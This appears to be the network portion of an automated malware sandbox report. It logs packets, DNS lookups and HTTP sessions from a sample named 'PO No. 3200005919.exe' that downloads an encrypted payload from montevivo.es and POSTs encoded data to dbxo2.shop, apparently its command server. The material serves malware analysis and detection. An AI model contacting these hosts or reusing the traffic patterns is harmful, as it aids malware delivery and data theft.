Nov 28, 2022 16:37:04.662781000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.662898064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.662955046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.662962914 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.662966967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.662977934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.662993908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663006067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663058996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663070917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663080931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663095951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663108110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663132906 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.663132906 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.663305044 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.663752079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663862944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663918018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663928986 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663939953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663954020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663968086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.663979053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.664024115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.664036036 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.664047003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.664057970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.664112091 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.664112091 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.664278984 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.664448977 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.664897919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665009022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665061951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665075064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665086031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665102005 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665117025 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665128946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665139914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665158033 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665170908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665183067 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665194035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665205956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665250063 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.665419102 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.665419102 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.665829897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665941954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.665993929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666006088 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666016102 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.666018009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666029930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666066885 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666120052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666131973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666143894 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666160107 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666172028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666187048 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.666187048 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.666357040 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.666526079 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.666800022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666920900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666974068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666986942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.666999102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.667013884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.667028904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.667041063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.667052984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.667062998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.667160034 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.667330027 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.959798098 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:05.168988943 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:05.177839994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.889936924 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:15.910849094 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.911019087 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:15.911338091 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:15.911377907 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:15.911427975 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:15.911478043 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:15.932115078 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.932192087 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.932241917 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.932250023 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.932257891 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.932391882 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:15.932451010 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.932492971 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:15.932566881 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.932576895 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.932585001 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.932594061 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.953372002 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.953666925 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.953725100 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.953767061 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.953808069 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.953846931 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.953886986 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:15.953927994 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:16.141227961 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:16.141293049 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:16.141423941 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:16.141598940 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:16.141664982 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:16.162759066 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:16.385514975 CET	80	49832	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:16.385780096 CET	49832	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:22.401308060 CET	49829	80	192.168.11.20	86.109.170.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2022 16:37:02.006957054 CET	57936	53	192.168.11.20	1.1.1.1
Nov 28, 2022 16:37:02.198887110 CET	53	57936	1.1.1.1	192.168.11.20
Nov 28, 2022 16:37:02.549231052 CET	63538	53	192.168.11.20	1.1.1.1
Nov 28, 2022 16:37:02.597363949 CET	53	63538	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 28, 2022 16:37:02.006957054 CET	192.168.11.20	1.1.1.1	0xc0b2	Standard query (0)	montevivo.es	A (IP address)	IN (0x0001)	false
Nov 28, 2022 16:37:02.549231052 CET	192.168.11.20	1.1.1.1	0x62fb	Standard query (0)	dbxo2.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 28, 2022 16:37:02.198887110 CET	1.1.1.1	192.168.11.20	0xc0b2	No error (0)	montevivo.es	86.109.170.4	A (IP address)	IN (0x0001)	false
Nov 28, 2022 16:37:02.597363949 CET	1.1.1.1	192.168.11.20	0x62fb	No error (0)	dbxo2.shop	104.21.2.6	A (IP address)	IN (0x0001)	false
Nov 28, 2022 16:37:02.597363949 CET	1.1.1.1	192.168.11.20	0x62fb	No error (0)	dbxo2.shop	172.67.128.117	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

montevivo.es

dbxo2.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49829	86.109.170.4	80	C:\Users\user\Desktop\PO No. 3200005919.exe

Timestamp	kBytes transferred	Direction	Data
Nov 28, 2022 16:37:02.259182930 CET	48	OUT	GET /lPkFJXszrxOMoP0.hhp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: montevivo.es Cache-Control: no-cache
Nov 28, 2022 16:37:02.334062099 CET	48	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 28 Nov 2022 15:37:02 GMT Content-Type: application/octet-stream Content-Length: 114752 Last-Modified: Fri, 25 Nov 2022 00:43:28 GMT Connection: keep-alive ETag: "63800fb0-1c040" X-Powered-By: PleskLin Accept-Ranges: bytes
Nov 28, 2022 16:37:02.334155083 CET	49	IN	Data Raw: 17 3f 56 32 c4 8d 22 8b 1c 48 a5 da 47 99 04 85 61 a7 15 c5 a6 78 22 b6 4a ec d4 d1 08 8e 8c 76 e0 af 75 3f 9b 25 d0 aa c3 a4 bc 39 20 8f 55 c2 ce f5 b6 80 2d 7f 4c a4 38 c9 90 df 05 2e ae 2a a2 0d 02 a2 ed b8 59 77 7f 60 0c 15 cf d1 41 90 59 9e Data Ascii: ?V2"HGax"Jvu?%9 U-L8.*Yw`AYDGF-gA4r{fsms$-Bi:NXdgNJ~fm+1Sw(%{u@=N8!Srfo5p+ P_]'`oVo:S'\E<[EYC14z
Nov 28, 2022 16:37:02.334222078 CET	51	IN	Data Raw: 6d be 88 5c 65 fa e3 17 50 a3 e8 96 01 6d 7b dc 24 23 56 c8 b5 51 40 66 fe d7 07 61 d7 32 c0 fa cd de 32 bd 3e f2 7f 31 26 98 24 ca ca 44 52 82 07 83 3b be 77 92 db 1e 99 50 5b a3 94 78 92 6e 3c 1e a6 12 00 86 a4 06 5a 57 d6 e8 cd 8d 78 3b 56 7f Data Ascii: m\ePm{$#VQ@fa22>1&$DR;wP[xn<ZWx;VHEejY"]IxAD7xn_d&?u_%y,\|=zhj*n,Z!W<`hL[UR-m !_~rU4M}
Nov 28, 2022 16:37:02.334285021 CET	52	IN	Data Raw: c5 e5 8d bd 76 f4 9e 62 b7 ef dc f0 03 20 f3 66 79 7e 45 a8 59 15 a2 0f 9c 04 d6 ed 6f a7 09 81 38 02 58 2b a3 88 c2 b1 88 da eb 93 fa 97 ae 85 96 9b b9 a5 9d 10 61 c4 06 28 a4 b4 18 14 86 a3 19 06 99 b3 ba 50 49 ef a2 80 d1 c2 df 6c ee 47 d4 26 Data Ascii: vb fy~EYo8X+a(PIlG&!QlZ7Z;}}q\|?d$=3dg$DWGqGM\|4Z!~f\|-iv*#L?lme0y8iuWq<w:2Y+q
Nov 28, 2022 16:37:02.334350109 CET	53	IN	Data Raw: 8d c5 6f 15 41 02 d7 ce fc d2 71 05 33 fe fa 46 bf 7b 90 f7 52 c3 fc d8 f5 90 ce b6 9e c9 33 0d 78 77 3a df ff f3 70 ef 6d 67 49 4c fc e9 b7 b3 e5 68 e2 6b 94 d9 6b 99 3b e7 5d 08 cd 41 81 ac 12 99 47 49 96 72 1a ef 57 d2 2b e7 bb 9b f4 5b 9e c0 Data Ascii: oAq3F{R3xw:pmgILhkk;]AGIrW+[FfUnV f"`ia/YJJ8/9`(?bUmBw!#A.Y1XQ8#4P+VtsTT)/a
Nov 28, 2022 16:37:02.334414005 CET	55	IN	Data Raw: 67 44 aa 1f 93 a4 7d 34 0a 0e f2 a3 a0 64 14 18 e0 37 4d ba fe 3e e7 7f 96 b3 66 26 05 c1 1f 76 94 38 47 3a 1b 83 71 4b 12 0b d9 72 10 c1 b8 d1 d9 2f 04 c4 1e d8 07 45 3a c7 18 92 40 5b e7 10 1b 99 8a 72 e8 d3 e7 f3 51 ad bc 16 de a8 fe 5a da d1 Data Ascii: gD}4d7M>f&v8G:qKr/E:@[rQZDXv%6,yV&(,R`%^%Jy^`Xc)hJ?a#=,$JGzh>SVfMY#U=I#]tTFD@W#KN!/b{iy\|ZeF]
Nov 28, 2022 16:37:02.334484100 CET	56	IN	Data Raw: 0b bf 5a 99 2c 00 f3 bb 74 9c c6 5e 80 de f7 7b 50 dc 7b c6 80 34 aa 03 c4 be dc e5 bc 9b 7d 5c b5 b7 3f 55 26 92 97 10 24 e3 10 3f 91 84 72 42 c6 cf dc 1f 8c 18 cb 2a a0 aa 6b 6d 87 9e 47 ef 76 85 4f 4f ac 8b 85 a7 05 39 68 21 7c 1e eb 2a 70 14 Data Ascii: Z,t^{P{4}\?U&$?rBkmGvOO9h!\|pZR+&o?Q=^A~/~A?I=i7g)/pu*3/}fsm}@p~rdE'YFP-)ey9RRH9$ly8C
Nov 28, 2022 16:37:02.334547997 CET	57	IN	Data Raw: be 8d 14 ab 5f 9a f1 05 15 6c 00 5c 45 f3 be 86 e9 fd 71 b1 ab b9 d1 ef 1b 8b 30 5b 39 f4 ff f4 58 5c fb c4 f5 4d 23 7e 89 17 a6 e4 b5 9b b0 59 58 35 49 ff 1f a7 76 ab b1 1f a4 97 e2 0e 03 f2 98 49 d7 8e 29 4b 28 95 9a ba 88 97 50 09 6f ac 57 d5 Data Ascii: _l\Eq0[9X\M#~YX5IvI)K(PoW?8}BtE9Za<eV#@Yfms$4i9J@f)@kL$45y;-HfsQx\|tmC R5}+'P*_WQ[]3#`V?IE-y
Nov 28, 2022 16:37:02.334610939 CET	59	IN	Data Raw: bd a6 4d 8b bd 6d 82 51 51 71 c6 55 74 f0 b4 2f 27 91 99 ca 5d e8 58 9b 17 ea 6b e4 4e ac 2c ab ad ef b6 b1 da 30 22 42 9c cf e0 b0 d1 a8 17 95 99 bc 5a 49 3e 61 c5 74 f4 af e2 c7 ec 97 98 83 85 9b d8 3f be 36 fa 2b b9 86 b4 56 63 4e 71 9f 59 be Data Ascii: MmQQqUt/']XkN,0"BZI>at?6+VcNqYw#GF^=\|<uNkx)&\`y_(_YbV"-%Gu"?CD2]#XzoV\|?)})n$$*d'zk<
Nov 28, 2022 16:37:02.334673882 CET	60	IN	Data Raw: 3c 3e 7a d2 a7 66 93 65 f4 0f 5d e6 c6 c8 44 b0 cc 4d 36 3b d5 27 93 e6 a6 53 c6 7e e1 c1 cf 3f 35 32 e7 d6 ee 9e af 3d 67 71 ba 47 7d 2a b7 3e a3 65 50 2f 8c b6 b3 87 cf a8 61 f5 44 a5 95 5f bd 3b b3 87 9e 7b 35 e8 2c 4b ff 06 6e 8e 99 d1 64 43 Data Ascii: <>zfe]DM6;'S~?52=gqG}*>eP/aD_;{5,KndCp}(5'CV-^PF]M!q9lnzIB%]74+=[P39&E/\|wFv/vt]7PO3f~@h~<-4mF9Tt}J+u
Nov 28, 2022 16:37:02.384736061 CET	61	IN	Data Raw: a6 ea a2 15 89 f8 bb c8 6e cb 6e 35 99 45 22 46 e8 95 05 f8 f1 be 38 5d 44 10 33 60 7d 27 e4 f4 bb af c5 74 80 e1 82 90 e3 ba d5 a9 71 23 3f f4 14 28 79 34 74 76 65 45 c9 c2 d2 1e b7 bb 30 52 b2 0e 56 53 1b 66 c9 e5 d7 cd 44 b6 6b 29 8d 93 cc 7c Data Ascii: nn5E"F8]D3`}'tq#?(y4tveE0RVSfDk)\|:Wa,Pz6y1uX)_x4*A~,'9d~,6lF+o`oi_e?4(AI~JfqlZ(ct'a(p\BI

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49830	104.21.2.6	80	C:\Users\user\Desktop\PO No. 3200005919.exe

Timestamp	kBytes transferred	Direction	Data
Nov 28, 2022 16:37:02.608408928 CET	170	OUT	POST /dbx2/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: dbxo2.shop Content-Length: 111 Cache-Control: no-cache Data Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 10 8b 30 64 ef 26 66 97 26 66 9d 42 70 9d 37 70 9d 36 70 9c 47 70 9d 35 70 9d 37 70 9d 33 13 ec 26 66 9a 26 66 9e 26 66 98 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0d&f&fBp7p6pGp5p7p3&f&f&f
Nov 28, 2022 16:37:03.671390057 CET	178	IN	HTTP/1.1 200 OK Date: Mon, 28 Nov 2022 15:37:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.37 Vary: Accept-Encoding,User-Agent CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k9Isj%2FVClJkUeePqNL46cRtEgce9bhc1pU3EkDTkCR%2Fs1i7oTXjX4K%2BQPSiPtKUP6qGbZEgttwOlU7C5jMJSJaJ0rZ2ba1RNnRyX3ABlIJuVQVL647u%2F8z99RnBL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 77142ebf5b809b9a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 34 34 35 65 0d 0a 3f 36 90 4f 06 dd 77 1e d7 33 21 e2 50 65 dc 4f 04 9e 48 07 c9 68 2d ed 50 03 f8 56 65 f8 50 00 e8 49 05 fc 68 39 e3 51 06 f8 60 07 e9 55 2f cf 30 07 d8 60 13 d9 49 1e c7 36 65 cb 4b 04 dd 48 3c 9b 68 37 9c 4e 24 e2 40 3a db 66 12 d6 79 1e c9 68 2f e3 42 3e dc 40 06 9e 49 11 ff 73 12 ed 57 1c e4 49 03 f8 57 07 f8 49 04 fb 68 6c e9 50 00 d6 45 1f f8 7b 10 cc 31 1b 9f 61 02 f8 76 31 e6 4d 36 ed 50 3a db 67 1d c6 33 19 ed 6c 20 f4 44 6c c4 48 3c d9 72 19 c0 6b 26 cd 7a 3a e4 4e 2f ef 49 1e d9 68 21 ed 52 65 e5 50 04 c5 7b 18 ea 4a 20 e3 57 1c 9b 4f 3f eb 33 18 d7 37 61 e0 47 25 cf 52 04 9e 48 69 81 60 6b 92 6d 6b 07 16 0c 82 a6 43 b3 75 f4 a5 1e 37 09 14 00 82 a8 5f f0 71 f2 a7 56 79 0a 57 48 9e e6 00 b0 66 f1 a7 09 19 3c f6 65 ac cb 30 9e 06 9d cb 33 ab 99 66 65 17 cb 30 9e 02 9d cb 33 14 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 ec 66 66 65 a1 d4 8a 90 02 29 c2 fe 75 de 67 29 62 ea 64 f6 6b ee eb 43 26 09 01 17 ce a6 10 fd 63 f3 a5 5c 20 46 04 00 8f b9 45 f0 22 f4 a5 13 10 29 35 45 c2 a4 54 fb 2c 90 c6 39 70 66 66 65 af cb 30 9e d9 f0 c0 f2 cb 6a 03 f7 30 c7 55 0c 9d 91 ae a1 b8 08 03 f6 31 c7 55 0c ee f3 aa a0 c9 6a 03 f7 43 a5 aa 0c 9c 91 ae a1 b8 08 01 f6 31 c7 55 0c 50 f4 a8 5b cb 6a 03 f7 ff 8e 30 9e 4e 9c c9 33 d5 dc 44 c9 af cb 30 9e 02 9d cb 33 b4 66 64 44 a4 ca 3e 94 02 9b cb 33 54 62 66 65 af cb 30 9e 02 9d cb 33 54 76 66 65 af eb 30 9e 02 9d cb 23 54 76 66 65 af c9 30 9e 08 9d cb 33 5e 66 66 65 a5 cb 30 9e 02 9d cb 33 54 56 66 65 af c9 30 9e 0e d7 cb 33 57 66 26 60 af cb 34 9e 02 8d cb 33 54 66 76 65 af db 30 9e 02 9d cb 33 44 66 66 65 af da 30 9e 29 9e cb 33 54 66 66 65 af cb 30 9e 02 bd cb 33 a4 65 66 65 af cb 30 9e 02 9d cb 33 54 6a 66 65 97 f6 30 9e 02 9d cb 33 54 66 66 65 af db 30 9e 56 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af Data Ascii: 445e?6Ow3!PeOHh-PVePIh9Q`U/0`I6eKH<h7N$@:fyh/B>@IsWIWIhlPE{1av1M6P:g3l DlH<rk&z:N/Ih!ReP{J WO?37aG%RHi`kmkCu7_qVyWHf<e03fe03ffe03Tffe03Tffe03ffe)ug)bdkC&c\ FE")5ET,9pffe0j0U1UjC1UP[j0N3D03fdD>3Tbfe03Tvfe0#Tvfe03^ffe03TVfe03Wf&`43Tfve03Dffe0)3Tffe03efe03Tjfe03Tffe0V3Tffe03Tffe03Tffe
Nov 28, 2022 16:37:03.671511889 CET	179	IN	Data Raw: cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 7a 12 03 1d db cb 30 9e 29 99 cb 33 54 76 66 65 af cd 30 9e 02 9f cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 74 66 66 Data Ascii: 03Tffe03Tffe03Tffe03z0)3Tvfe03Tffe03tffCa3efe03Tnfe03Tffe03D03offe0V3Tffe.q23Yffe03dfe0'Tffe03Tffe0P`$}kE$s0c9K
Nov 28, 2022 16:37:03.671583891 CET	181	IN	Data Raw: 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af Data Ascii: 3Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe0
Nov 28, 2022 16:37:03.671638966 CET	182	IN	Data Raw: 9d f2 33 7a 66 57 65 9a cb 30 9e 46 9d cb 33 55 66 30 65 ce cb 42 9e 44 9d a2 33 38 66 03 65 e6 cb 5e 9e 64 9d a4 33 54 66 66 65 8b cb 34 9e 02 9d 9f 33 26 66 07 65 c1 cb 43 9e 6e 9d aa 33 20 66 0f 65 c0 cb 5e 9e 02 9d cb 33 5d 62 d6 61 af cb 30 Data Ascii: 3zfWe0F3Uf0eBD38fe^d3Tffe43&feCn3 fe^3]ba03Tffe03Tffe03l[fe22RoLM[pU-"8do``3`lN42PXU'2PgR?3bg/26heg0EiC]g@d"kI7
Nov 28, 2022 16:37:03.671694040 CET	183	IN	Data Raw: d7 35 95 ff bb a0 62 26 85 3b 65 0a 49 e9 e8 cf 3d b1 03 2e f7 0b 1a f0 06 6c 1f 93 c9 fc 8a 05 1b 4c 4a ab d2 ec 90 7e ca 50 30 18 1d 7b 47 fc 49 77 a8 ce ad 60 71 dd c3 54 6f 80 8f 1e a0 81 5a 92 6b 34 a4 1a bc 2a d7 99 c2 ff 6f 2a 3d ca b3 9c Data Ascii: 5b&;eI=.lLJ~P0{GIw`qToZk4o=Z8ut!Ww%cJJ&Fx%Z\|~\0);PbYI\=Es~(Os<ZDd e13Tg@~^3Uffd=M{kd528do`f6GV
Nov 28, 2022 16:37:03.671749115 CET	185	IN	Data Raw: 2d 01 9c 88 0c c4 33 18 ae aa 50 58 c3 2f 70 c1 5c 24 3b c3 f7 15 62 ad fc 1c dd 43 9d 7f 84 50 e5 0f ed 58 48 15 72 0d d3 da 16 13 4b 27 e7 af b7 76 c4 b6 8b 8e d2 15 77 51 0d 2f 77 6d f9 6d 20 d3 71 8d 64 31 bd 90 e3 58 59 4f 03 90 81 20 11 e2 Data Ascii: -3PX/p\$;bCPXHrK'vwQ/wmm qd1XYO sjl3xt?srJXifO8~O=+^}QVo1^UC0Y`oO)i6QfV:r1\9WU:BJd9k\'
Nov 28, 2022 16:37:03.671803951 CET	186	IN	Data Raw: 1c cc 9d 74 3c 53 50 32 da f7 3e 30 b8 34 c9 75 da 2d c2 3f e9 fa b2 e4 57 c1 37 94 0b 11 79 20 5a b3 cf c4 49 11 03 1b 8e 0c f8 45 aa 8f 93 c4 9f bd ed 39 fb 3a 09 3a 49 4b 2c dd b4 4e 9d d8 4e 7a 0b d3 6f 9d 53 70 3a 72 58 2d d7 8c b0 75 9e 60 Data Ascii: t<SP2>04u-?W7y ZIE9::IK,NNzoSp:rX-u`"z*_@hu%=G([nYgk(e<`hWv8yIqIz37Fgv[N-b\|0AU^uBfg4ua"p'}woKKh1r.e05
Nov 28, 2022 16:37:03.671859026 CET	187	IN	Data Raw: bc 1e f3 6b fe b9 5c 27 09 00 11 81 a8 5f f3 2d ed a0 5a 7b 05 03 17 db b8 1f d3 6b fe b9 5c 27 09 00 11 fd a4 5f ea 41 f8 b9 47 7a 05 14 11 9f d8 36 9d 57 80 ee 37 58 56 6c 63 a7 e0 36 9f 07 98 cc 30 5c 56 6b 63 a6 e1 b6 d6 84 6a c6 32 55 63 63 Data Ascii: k\'_-Z{k\'_AGz6W7XVlc60\Vkcj2UcceI2\:e!*-7+dDY sJ?G^61gdRI1$s)lc"nQ\|"{_RIfFZ 0w+&WTy7kEl@ka2
